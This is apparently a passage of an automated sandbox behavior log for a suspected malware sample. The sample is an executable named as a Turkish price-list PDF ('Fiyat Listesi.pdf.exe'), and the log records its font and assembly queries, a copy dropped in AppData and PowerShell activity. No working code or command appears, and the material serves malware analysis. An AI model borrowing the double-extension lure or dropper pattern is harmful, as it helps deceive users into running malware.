                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | VolumeInformation
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll | VolumeInformation
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
